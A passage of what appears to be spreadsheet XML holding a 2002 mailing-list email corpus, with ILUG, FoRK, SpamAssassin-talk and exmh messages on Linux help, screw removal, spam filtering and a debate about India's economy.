    <t>Wed, 21 Aug 2002 14:52:11 +0800 (PHT)</t>
  </si>
  <si>
    <t>al@mpsc.ph</t>
  </si>
  <si>
    <t>[ILUG] dial-on-demand</t>
  </si>
  <si>
    <t>Could you please help me how to set up a dial-on-demand, what are the\npackages needed,\nand other requirements to get on.\nDo you know a site that has a how to and the package where to get it.\nPlease help me please for this was my assignment.\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "'johnhall@evergo.net'" &lt;johnhall@evergo.net&gt;, fork@spamassassin.taint.org\nFrom: "Pang, Hokkun" &lt;HPang@Yesmail.com&gt;\nDate: Wed, 21 Aug 2002 14:33:01 -0500</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 14:33:01 -0500</t>
  </si>
  <si>
    <t>"Pang, Hokkun" &lt;HPang@Yesmail.com&gt;</t>
  </si>
  <si>
    <t>"'johnhall@evergo.net'" &lt;johnhall@evergo.net&gt;, fork@spamassassin.taint.org</t>
  </si>
  <si>
    <t>RE: The Curse of India's Socialism</t>
  </si>
  <si>
    <t>This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01C24949.8F9C7170 Content-Type: text/plain; 	charset="iso-8859-1" The best comparison for India is China. They have similar population, resources and historical misfortunes. They even had similar per captia income years back.  As of today, you definitely see more products made in China than in India. So if  you think material well being is what defines a better nation, then you should look  at what China is doing differently from India. ------_=_NextPart_001_01C24949.8F9C7170 Content-Type: text/html; 	charset="iso-8859-1" RE: The Curse of India's Socialism The best comparison for India is China. They have similar population, resources and historical misfortunes. They even had similar per captia income years back.  As of today, you definitely see more products made in China than in India. So if  you think material well being is what defines a better nation, then you should look  at what China is doing differently from India. ------_=_NextPart_001_01C24949.8F9C7170-- [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: "FoRK" &lt;FoRK@xent.com&gt;\nFrom: "Jim Whitehead" &lt;ejw@cse.ucsc.edu&gt;\nDate: Wed, 21 Aug 2002 14:22:51 -0700</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 14:22:51 -0700</t>
  </si>
  <si>
    <t>IT "fossils"</t>
  </si>
  <si>
    <t>While wandering through Uppsala, Sweden last week, I ran across the\n"Keramik" studio of Paula von Freymann. Her pottery work has the theme of\n"fossils for the future", and she has two main lines of this work. One is\nmore conventional, taking leaves from plants at the nearby Linneas Gardens\nand impressing them into the clay before firing, leaving a "fossil" of the\nplant.\n\nThe other is more unique, taking imprints of circuit boards, cellular\ntelephones, punched cards, etc. and then firing the result to make "IT\nfossils." Given how quickly most of our work becomes obsolete, I found the\noffbeat notion of IT fossilization an oddly fitting way of archiving the\nphysical detritus of the digital age.\n\n[URL]http://www.kuai.se[/URL]\n[URL]http://www.kuai.se[/URL]\n[URL]http://www.kuai.se[/URL]\n\nMy guess is she'd gladly make fossils of any object you wanted, for a price.\nCould be an interesting memorial of your next product launch!\n\n- Jim\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.kuai.se http://www.kuai.se http://www.kuai.se http://xent.com</t>
  </si>
  <si>
    <t>SWE</t>
  </si>
  <si>
    <t>To: SAtalk &lt;spamassassin-talk@example.sourceforge.net&gt;\nFrom: Daniel Roethlisberger &lt;daniel@roe.ch&gt;\nDate: Wed, 21 Aug 2002 14:05:29 +0200</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 14:05:29 +0200</t>
  </si>
  <si>
    <t>Daniel Roethlisberger &lt;daniel@roe.ch&gt;</t>
  </si>
  <si>
    <t>SAtalk &lt;spamassassin-talk@example.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>[SAtalk] German spam corpus / foreign language spam</t>
  </si>
  <si>
    <t>I've been lurking the SA lists since I installed SA on a production machine a while back. While SA did a surprisingly accurate job on detecting English language spam, it did not succeed very well on German language spam, which I keep getting increasing amounts of lately. I've got a lousy results with out of the box scores, very few spam is acually cought. What is the strategy with respect to foreign language spam recognition in SA? I've seen extremely few non-english rules. Is there foreign language rule development going on? Has anybody done work on German spam? In any case, I've started spam/nonspam corpi consisting of only German (and Swiss-German, respectively) messages, to be able to help with German rules. Anybody willing to contribute to the corpus feel free to resend/bounce German spam in a sane way to spam@roe.ch . I cannot be bothered to subscribe to SAsightings just for the odd German spam every hundred++ messages.. how about a list for foreign language spam sightings? Has anybody done this before or am I on the edge of duplicating effort here? I've been thinking on this a bit. I think it would be best if there would be general provisions for foreign language rules. In the spirit of the ok_languages option; let users easily enable or disable rules in certain languages. Like a foreign_rules option which could be used to control which foreign rulesets are active. Usually people would want to use checks in all languages which are in the ok_languages list. Is there any development or are there plans along those lines? Are there other people willing to contribute to effective spam filtering rules in German language? Any kind of feedback is welcome, even flames ;) Cheers, Dan --     Daniel Roethlisberger     OpenPGP key id 0x804A06B1 (1024/4096 DSA/ElGamal)    144D 6A5E 0C88 E5D7 0775 FCFD 3974 0E98 804A 06B1    &gt;&gt; privacy through technology, not legislation &lt;&lt; ------------------------------------------------------- This sf.net email is sponsored by: OSDN - Tired of that same old cell phone?  Get a new here for FREE! [URL]https://www.inphonic.com[/URL] _______________________________________________ Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: Robert Elz &lt;kre@munnari.OZ.AU&gt;\nFrom: Brent Welch &lt;welch@panasas.com&gt;\nDate: Wed, 21 Aug 2002 13:35:27 -0700</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 13:35:27 -0700</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;Robert Elz said:\n\n &gt; I kind of doubt that any pre built-in sequence name is going to be\n &gt; very general.   Even "unseen" can be changed (fortunately that one\n &gt; is easy to find in the MH profile - though whether exmh does that,\n &gt; os just uses "unseen" I haven't bothered to find out).\n\nexmh uses the profile setting - it appears as mhProfile(unseen-sequence)\nin the code.\n\n--\nBrent Welch\nSoftware Architect, Panasas Inc\nPioneering the World's Most Scalable and Agile Storage Network\n[URL]www.panasas.com[/URL]\nwelch@panasas.com\n\n\n\n\n_______________________________________________\nExmh-workers mailing list\nExmh-workers@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Niall Brady &lt;bradyn@maths.tcd.ie&gt;\nDate: Wed, 21 Aug 2002 13:33:06 +0100</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 13:33:06 +0100</t>
  </si>
  <si>
    <t>Niall Brady &lt;bradyn@maths.tcd.ie&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] URGENT: Cant get a skrew out... PLEASE HELP!</t>
  </si>
  <si>
    <t>On Wed, 21 Aug 2002 12:42:17 BST, Kiall Mac Innes said:\n&gt;Hi i have a phillips head skrew thats holding a circut board together i need\n&gt;to take it out ASAP and nothing will work, the threads on the skrew are\n&gt;almost completly gone, its is a very small skrew that i have to use a\n&gt;percision skrewdriver set to remove the skrews any help would be\n&gt;appreaciated...\n\nGet a very, *very* small set of drill bits.  Start drilling right\nthrough the center of the head, at a slow speed so you don't pop\noff and through the board!  Once you have a bit of an indent in,\nincrease the speed a little bit.\n\nIf you've made a deepish indent, and the head doesn't pop off, use\nthe next largest drill bit you have.  Repeat until happy.\n\nEventually the head should just pop off, allowing you to lift the\nboard off over the shaft of the screw... then ye can take out the\nrest fairly easily with a pliers or whatnot.\n\n-- \n	Niall\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Irish Linux Users Group &lt;ilug@linux.ie&gt;\nFrom: Declan Grady &lt;Declan.Grady@nuvotem.com&gt;\nDate: Wed, 21 Aug 2002 13:28:00 +0100</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 13:28:00 +0100</t>
  </si>
  <si>
    <t>Declan Grady &lt;Declan.Grady@nuvotem.com&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] relating data from 2 ascii files ?</t>
  </si>
  <si>
    <t>Cheers Padraig.\n\nExactly what I needed.\n\nI knew I liked linux !!!\n\nCheers,\nDeclan\n\n\nOn Wed, Aug 21, 2002 at 12:30:12PM +0100, Padraig Brady mentioned:\n&gt; \n&gt; man join\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Theo Van Dinter &lt;felicity@kluge.net&gt;,\nFrom: Justin Shore &lt;listuser@neo.pittstate.edu&gt;\nDate: Wed, 21 Aug 2002 13:16:18 -0500</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 13:16:18 -0500</t>
  </si>
  <si>
    <t>Re: [SAtalk] Highest-scoring false positive</t>
  </si>
  <si>
    <t>At 11:34 AM -0400 8/21/02, Theo Van Dinter wrote:\n&gt;On Wed, Aug 21, 2002 at 10:16:33AM -0500, Frank Pineau wrote:\n&gt;&gt;  Omaha Steaks *is* spam.  I bought something from them once. \n&gt;&gt;*Great* steaks, but\n&gt;&gt;  then they started calling me, emailing me, snail-mailing, \n&gt;&gt;constantly.  I once\n&gt;\n&gt;If you sign up for something, it's not spam by definition, aggressive as\n&gt;they may be.  (I told them to stop calling me, and they stopped, so ...)\n\nI call it spam if I ask to be removed from the spamming list though. \nI occasionally buy X-10 stuff.  I've learned from past experiences to \ncreate a quick mail alias to get order confs and what not.  Then can \nit once the order is complete because those spamming SOBs will not \nstop filling my inbox with 3-6 ads per day.  I've LARTed them and \ntheir upstream numerous times asking to be list washed.  I don't even \nget an auto-ack.  I started a procmail recipe to reject mail to them \nand include a form letter (I was planning on later appending every \npiece of x-10 spam I've archived to the form letter for their reading \npleasure...) but I haven't gotten it to work.  Bottom line, if I gave \nthem permission to mail me (explicitly or via privacy policy), it's \nnot spam but once I told them to stop mailing me then it's spam.\n\nMy $.02\n  Justin\n-- \n\n--\nJustin Shore, ES-SS ES-SSR                Pittsburg State University\nNetwork &amp; Systems Manager                 [URL]http://www.pittstate.edu[/URL]\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http://www.pittstate.edu https://www.inphonic.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: "Ilug@Linux.Ie" &lt;ilug@linux.ie&gt;\nFrom: "Justin MacCarthy" &lt;macarthy@iol.ie&gt;\nDate: Wed, 21 Aug 2002 13:03:30 +0100</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 13:03:30 +0100</t>
  </si>
  <si>
    <t>"Justin MacCarthy" &lt;macarthy@iol.ie&gt;</t>
  </si>
  <si>
    <t>"Ilug@Linux.Ie" &lt;ilug@linux.ie&gt;</t>
  </si>
  <si>
    <t>[ILUG] Update on  PC Cases</t>
  </si>
  <si>
    <t>Hi all, I posted the below question to this list so I thought I'd update you\nall. Thanks for your suggestions.\n\nWell, I'd decided to bite the bullet and spend big on a new case and CPU\nfan.\n\nI bought a lian-li aluminum case. It was expensive as cases go (stg133.86)\nbut I decided, it's a good basis to build any future PC on.\nIt has 4 x 51/4" drive bays and 6 x 3" drive bays so I should be ok for\nfuture upgrades etc. I have to say it was worth it. Its a pleasure to work\non. It has a slide out tray to mount the Mother Board on, both sides come\noff, the drive bays come out...all without using a screwdriver (thumb\nscrews). Even the edges inside the case are smooth so no banging your hands\noff shape edges etc. There are 4 fans inside the case, which can be set to 3\ndifferent speeds. There are 4 usb ports on the front of the box too. The box\nis big and has loads of room inside.\nOh... and it looks very cool :-)\n\nHowever there are 2 things to look out for. On the Maplins website it says\n\n* Up to three 80mm case fans can be fitted!\n* ATX Power supply sold separately\n\nIn fact the case came with 4 fans and a power supply, which is great but I\nordered 2 fans and a power supply separately.\nAlso the case was a slightly different model to one advertised, as I got the\nUSB model. It does say (Product may vary in design and specification from\nthat show) but I missed that :-)\n\nI also bought a Flower Cooler Kit which is completely silent. Very nice.\n(thanks Mike)\n\nSo now I can code-in-peace...\n\nJustin\n\n\n&gt; -----Original Message-----\n&gt; From: ilug-admin@linux.ie [mailto:ilug-admin@linux.ie]On Behalf Of\n&gt; Justin MacCarthy\n&gt; Sent: Monday, August 12, 2002 12:56 PM\n&gt; To: Ilug@Linux.Ie\n&gt; Subject: [ILUG] PC Cases\n&gt;\n&gt;\n&gt; Hi all, I have a Linux box at home that makes a god awful amount of noise.\n&gt; Its a Athlon XP 1900+  with a  CoolerMaster fan.  Are they particularly\n&gt; noisy? I think its  the case/psu fan. It was a pretty cheap case. So what\n&gt; I'm looking for a quieter case/fan/power supply. I know you can get really\n&gt; quiet cases if you want to spend, but I'm looking for something in the\n&gt; middle ground, available in Dublin.\n&gt;\n&gt; Anyone recommend anything ? Thanks\n&gt;\n&gt; Justin\n&gt;\n&gt;\n&gt; --\n&gt; Irish Linux Users' Group: ilug@linux.ie\n&gt; [URL]http://www.linux.ie[/URL] for (un)subscription\n&gt; information.\n&gt; List maintainer: listmaster@linux.ie\n&gt;\n&gt;\n&gt;\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Kiall Mac Innes &lt;kialllists@redpie.com&gt;\nFrom: "Cathal A. Ferris" &lt;pio@csn.ul.ie&gt;\nDate: Wed, 21 Aug 2002 12:54:15 +0100 (IST)</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 12:54:15 +0100 (IST)</t>
  </si>
  <si>
    <t>"Cathal A. Ferris" &lt;pio@csn.ul.ie&gt;</t>
  </si>
  <si>
    <t>Kiall Mac Innes &lt;kialllists@redpie.com&gt;</t>
  </si>
  <si>
    <t>Spray a bit of wd40 around the screw, and leave for a few minutes\n\nTry using a small crocodile-nosed pliers if you have enough space around\nth head of the screw. If not, try a hacksaw blade on the shaft of the\nscrew under the board (taking care not to scratch the underside of the\nboard. after cutting the screw, that holder on the board support structure\ncannot really be used again.\n\nAnother method is to get a small screwdriver that you can consider\ndisposable, and gently tap it into the head of the stripped screw, until\nyou either have a flat head screw, or you can get enough turning force\n on it.\n\nCathal.\n\nOn Wed, 21 Aug 2002, Kiall Mac Innes wrote:\n&gt; Hi i have a phillips head skrew thats holding a circut board together i need\n&gt; to take it out ASAP and nothing will work, the threads on the skrew are\n&gt; almost completly gone, its is a very small skrew that i have to use a\n&gt; percision skrewdriver set to remove the skrews any help would be\n&gt; appreaciated...\n&gt;\n&gt; Kiall Mac Innes\n&gt;\n&gt;\n&gt;\n\n-- \nCathal Ferris.			pio@skynet.ie\n+353 87 9852077			[URL]www.csn.ul.ie[/URL]\n---\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>www.csn.ul.ie http://www.linux.ie</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: "Kiall Mac Innes" &lt;kialllists@redpie.com&gt;\nDate: Wed, 21 Aug 2002 12:42:17 +0100</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 12:42:17 +0100</t>
  </si>
  <si>
    <t>"Kiall Mac Innes" &lt;kialllists@redpie.com&gt;</t>
  </si>
  <si>
    <t>[ILUG] URGENT: Cant get a skrew out... PLEASE HELP!</t>
  </si>
  <si>
    <t>Hi i have a phillips head skrew thats holding a circut board together i need\nto take it out ASAP and nothing will work, the threads on the skrew are\nalmost completly gone, its is a very small skrew that i have to use a\npercision skrewdriver set to remove the skrews any help would be\nappreaciated...\n\nKiall Mac Innes\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Kiall Mac Innes &lt;kialllists@redpie.com&gt;\nFrom: John Madden &lt;maddenj@skynet.ie&gt;\nDate: Wed, 21 Aug 2002 12:38:57 +0100</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 12:38:57 +0100</t>
  </si>
  <si>
    <t>John Madden &lt;maddenj@skynet.ie&gt;</t>
  </si>
  <si>
    <t>On (21/08/02 12:42), Kiall Mac Innes didst pronounce:\n&gt; \n&gt; Hi i have a phillips head skrew thats holding a circut board together i need\n&gt; to take it out ASAP and nothing will work, the threads on the skrew are\n&gt; almost completly gone, its is a very small skrew that i have to use a\n&gt; percision skrewdriver set to remove the skrews any help would be\n&gt; appreaciated...\n&gt; \nTry a hammer -- great precision tool that!!\n\n-- \nChat ya later,\n\nJohn.\n--\nBOFH excuse #167: excessive collisions &amp; not enough packet ambulances\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Declan Grady &lt;Declan.Grady@nuvotem.com&gt;\nFrom: Padraig Brady &lt;padraig.brady@corvil.com&gt;\nDate: Wed, 21 Aug 2002 12:30:12 +0100</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 12:30:12 +0100</t>
  </si>
  <si>
    <t>Declan Grady wrote:\n&gt; Hi folks,\n&gt; Apologies if this is the wrong place to ask, but I am trying to do on my linux desktop what I used to do with some other os software.\n&gt; \n&gt; I'm trying to use a combination of some bash scripts and some perl to generate reports from a couple of ascii files. Eventually these will run on a server and get the files by ftp, analyse them and mail me the results.\n&gt; \n&gt; As I'm no programmer (by any stretch of the imagination !) I'm getting a bit lost.\n&gt; \n&gt; I can deal with single files (eventually) using grep, egrep, awk, and a nice perl script called 'total' which i found while googling.\n&gt; \n&gt; Problem now is that the data I'm trying to report on is split between two isam files.\n&gt; \n&gt; File 1 contains\n&gt; Docket Number, Line Number, Item, quantity, price, duedate\n&gt; \n&gt; File 2 contains\n&gt; Docket Number, Customer, Shipping date, invoice number.\n&gt; \n&gt; To make some sense of the data, I need to relate the Docket number between the 2 files, so that I can generate a report by customer.\n&gt; \n&gt; My first reaction is to look at mysql, and import the ascii data into 2 tables so that I can use sql queries.\n&gt; \n&gt; Is this the way to go, or should I delve a bit deeper into perl ?\n&gt; \n&gt; Any advice welcome.\n\nman join\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Irish Linux Users Group &lt;ilug@linux.ie&gt;\nFrom: Declan Grady &lt;Declan.Grady@nuvotem.com&gt;\nDate: Wed, 21 Aug 2002 12:26:29 +0100</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 12:26:29 +0100</t>
  </si>
  <si>
    <t>[ILUG] relating data from 2 ascii files ?</t>
  </si>
  <si>
    <t>Hi folks,\nApologies if this is the wrong place to ask, but I am trying to do on my linux desktop what I used to do with some other os software.\n\nI'm trying to use a combination of some bash scripts and some perl to generate reports from a couple of ascii files. Eventually these will run on a server and get the files by ftp, analyse them and mail me the results.\n\nAs I'm no programmer (by any stretch of the imagination !) I'm getting a bit lost.\n\nI can deal with single files (eventually) using grep, egrep, awk, and a nice perl script called 'total' which i found while googling.\n\nProblem now is that the data I'm trying to report on is split between two isam files.\n\nFile 1 contains\nDocket Number, Line Number, Item, quantity, price, duedate\n\nFile 2 contains\nDocket Number, Customer, Shipping date, invoice number.\n\nTo make some sense of the data, I need to relate the Docket number between the 2 files, so that I can generate a report by customer.\n\nMy first reaction is to look at mysql, and import the ascii data into 2 tables so that I can use sql queries.\n\nIs this the way to go, or should I delve a bit deeper into perl ?\n\nAny advice welcome.\n\nThanks,\nDeclan\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: SpamAssassin-talk@example.sourceforge.net\nFrom: "Hess, Mtodd, /mth" &lt;mth@Ingersoll.com&gt;\nDate: Wed, 21 Aug 2002 11:37:23 -0500</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 11:37:23 -0500</t>
  </si>
  <si>
    <t>SpamAssassin-talk@example.sourceforge.net</t>
  </si>
  <si>
    <t>RE: [SAtalk] paulgraham.com article</t>
  </si>
  <si>
    <t>Yes, it is very impressive.  However, all of the most advanced content\nfiltering known to man is easily defeated by simply presenting the content\nin the form of a graphic image (GIF, JPG, etc.).  I'm surprised that more\nspammers don't already do this.  I know we have discussed this before, and\nmaybe we can detect this type of spam via the headers and with Razor/DCC (if\nyou're using them).  But that sure narrows down the ruleset (maybe that's\ngood).\n\nMTodd\n\n\n\n\n-----Original Message-----\nFrom: yyyy@spamassassin.taint.org [mailto:yyyy@spamassassin.taint.org]\nSent: Friday, August 16, 2002 12:52 PM\nTo: SpamAssassin-talk@example.sourceforge.net\nSubject: [SAtalk] paulgraham.com article\n\n\nQuite interesting -- it's pretty similar to the spam phrases stuff.  As\nScott pointed out, this would work quite well as a naive Bayesian system.\n(in fact, I think it may be quite close to being one already...)\n\nI like the way "FL" -- ie. Florida -- is one of the top scoring terms. ;)\n\nAlso, when I was doing the spam-phrases stuff, I discounted the ff0000\nthing, as HTML garbage! never realised it corresponded to "bright red" :(\nHave we got a test for that?\n\n--j.\n\n-- \n'Justin Mason' =&gt; { url =&gt; [URL]http://jmason.org[/URL] , blog =&gt; [URL]http://taint.org[/URL] }\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]\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http://jmason.org http://taint.org https://www.inphonic.com https://lists.sourceforge.net https://www.inphonic.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: Frank Pineau &lt;frank@pineaus.com&gt;\nFrom: Theo Van Dinter &lt;felicity@kluge.net&gt;\nDate: Wed, 21 Aug 2002 11:34:28 -0400</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 11:34:28 -0400</t>
  </si>
  <si>
    <t>Theo Van Dinter &lt;felicity@kluge.net&gt;</t>
  </si>
  <si>
    <t>Frank Pineau &lt;frank@pineaus.com&gt;</t>
  </si>
  <si>
    <t>On Wed, Aug 21, 2002 at 10:16:33AM -0500, Frank Pineau wrote: &gt; Omaha Steaks *is* spam.  I bought something from them once.  *Great* steaks, but &gt; then they started calling me, emailing me, snail-mailing, constantly.  I once If you sign up for something, it's not spam by definition, aggressive as they may be.  (I told them to stop calling me, and they stopped, so ...) --  Randomly Generated Tagline: We didn't put in ^^ because then we'd have to keep telling people what  it means, and then we'd have to keep telling them why it doesn't short  circuit.  :-/               -- Larry Wall in &lt;199707300650.XAA05515@wall.org&gt; ------------------------------------------------------- This sf.net email is sponsored by: OSDN - Tired of that same old cell phone?  Get a new here for FREE! [URL]https://www.inphonic.com[/URL] _______________________________________________ Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "John Hall" &lt;johnhall@evergo.net&gt;\nDate: Wed, 21 Aug 2002 11:30:27 -0700</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 11:30:27 -0700</t>
  </si>
  <si>
    <t>I don't know who said the below.\n\n1) Measured in money, you are wrong.  Different ethnic groups achieve at\nwidely different rates.  Always have.  A lot of research has been done\non that topic, Sowell among others.\n\n2) If you exchanged the population of India and America, in a generation\nIndia would look like America.  In Two, America would look like India.\n\n3) As Bob said: 'valuable resources' has notin' to do with it.  See\nJapan, Hong Kong, Singapore, ...\n\n\n&gt; &gt;\n&gt; &gt; I'm sure that if someone checked the statistics, that the number of\n&gt; &gt; "successful" vs. "unsuccessful" (how to define those?) Indian\n&gt; &gt; immigrants in the US is statistically similar to the number of\n&gt; &gt; successful vs. unsuccessful Scotsmen.  I'm not going to, though.\n&gt; &gt;\n&gt; &gt; India is poor because it always was poor.  Unlike other countries\n&gt; &gt; in the region (including Ghana, Nigeria, et al) that have emerged\n&gt; &gt; from the ashes of Imperialism with strong growth, India is not\n&gt; &gt; blessed with a strong base of valuable resources.\n&gt; \n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "John Hall" &lt;johnhall@evergo.net&gt;\nDate: Wed, 21 Aug 2002 11:25:34 -0700</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 11:25:34 -0700</t>
  </si>
  <si>
    <t>IAB: That is a GOOD think about South Korea.  Not a bad thing.\n\nThat is easy to see, since the people of India would like to have more\nof what SK has ...\n\n\n&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of\nRobert\n&gt; Harley\n&gt; Sent: Wednesday, August 21, 2002 3:10 AM\n&gt; To: fork@spamassassin.taint.org\n&gt; Subject: Re: The Curse of India's Socialism\n&gt; \n&gt; IAB wrote:\n&gt; &gt;This of course came at the expense of the environment: widespread air\n&gt; &gt;and water pollution, etc.: South Korea is the 10th largest CO2\n&gt; &gt;polluter in the world, despite ranking 26th in population.\n&gt; \n&gt; CO2 is pollution?  And here I am going around metabolizing glucose and\n&gt; exhaling carbon dioxide every four seconds since I was a kid!  Why\n&gt; didn't anybody tell me?!?  I'll hold my breath from now on.  Honest\nguv.\n&gt; \n&gt; R\n&gt; [URL]http://xent.com[/URL]\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "John Hall" &lt;johnhall@evergo.net&gt;\nDate: Wed, 21 Aug 2002 11:23:43 -0700</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 11:23:43 -0700</t>
  </si>
  <si>
    <t>&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of\nJustin\n&gt; Mason\n&gt; \n&gt; So IMO it's the corruption that's the problem; and corruption !=\n&gt; regulation, and corruption != socialism.   Also, over-population is\nreally\n&gt; a symptom of that.\n\nSocialism increases regulation which increases corruption.  But that\ndoesn't matter as much as if the official law does not conform to the\nfacts on the ground.\n\nIf you don't match the law to the facts on the ground, you wind up with\na two-tier society (De Soto's Bell Jar).  Worse, the massive evasion of\nthe official law encourages the corruption you speak of.\n\nIn some countries, the agencies in charge of registering property also\narrange for illegal living arrangements for their employees.  They do\nthis because even the people who run the system can't make it work for\npeople they care about.\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Robert Elz &lt;kre@munnari.OZ.AU&gt;\nFrom: Valdis.Kletnieks@vt.edu\nDate: Wed, 21 Aug 2002 11:22:27 -0400</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 11:22:27 -0400</t>
  </si>
  <si>
    <t>--==_Exmh_31119591P\nContent-Type: text/plain; charset=us-ascii\n\nOn Wed, 21 Aug 2002 15:01:07 +0700, Robert Elz said:\n\n&gt; Hmm - I've been using MH for a long time (since well before there were\n&gt; sequences) and I don't think I've ever seen a "pseq" ...\n\nMy bad - I had 'Previous-Sequence: pseq' in my .mh_profile from long ago and\nfar away.\n\n-- \n				Valdis Kletnieks\n				Computer Systems Senior Engineer\n				Virginia Tech\n\n\n--==_Exmh_31119591P\nContent-Type: application/pgp-signature\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.7 (GNU/Linux)\nComment: Exmh version 2.5 07/13/2001\n\niD8DBQE9Y7AzcC3lWbTT17ARAp/tAJ4gYhfoiqyVwy6CpYSsxdmq5//o5gCfWOy/\n7yBnBY65rPE7W6UWhH5aKc4=\n=RD0t\n-----END PGP SIGNATURE-----\n\n--==_Exmh_31119591P--\n\n\n\n_______________________________________________\nExmh-workers mailing list\nExmh-workers@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "John Hall" &lt;johnhall@evergo.net&gt;\nDate: Wed, 21 Aug 2002 11:18:18 -0700</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 11:18:18 -0700</t>
  </si>
  <si>
    <t>Property Rights</t>
  </si>
  <si>
    <t>Some of the reasons they don't own it is because it is government land\nthat you can't convert without an army of lawyers.\n\nIn other cases, you originally had owners who didn't have the 'right' to\nsubdivide, but they subdivide anyway.\n\nIt is interesting to note that for several centuries in Japan it was a\ndeath sentence to sell land.  They sold it anyway, and kept records.\n\nIn the US, we eventually got quite friendly with squatters and adverse\npossession, and integrated out extra-legal arrangements and 'spontaneous\nsocial contracts' into the official law.\n\nMr. Long, I think you'd particularly enjoy the De Soto work.\n\n\n\n&gt; -----Original Message-----\n&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of\nDave\n&gt; Long\n&gt; Sent: Tuesday, August 20, 2002 2:17 PM\n&gt; To: fork@spamassassin.taint.org\n&gt; Subject: RE: The Curse of India's Socialism\n&gt; \n&gt; \n&gt; &gt;                                                                   In\nthe\n&gt; &gt; Philippines, getting legal title can take 20 years.  In Egypt, about\n80%\n&gt; &gt; of the population in Cairo lives in places where they are officially\n&gt; &gt; illegal.\n&gt; \n&gt; If the situation in Egypt is anything\n&gt; like the situation in the Philippines,\n&gt; it's because people (due to a strange\n&gt; desire for jobs) squat on land which\n&gt; they don't own.*\n&gt; \n&gt; For people to be able to buy their own\n&gt; land, capitalism must be healthy, but\n&gt; not triumphant; there need to be too\n&gt; many capitalists, not too few.\n&gt; \n&gt; (how well off were the major landowners\n&gt; in india before independence?)\n&gt; \n&gt; -Dave\n&gt; 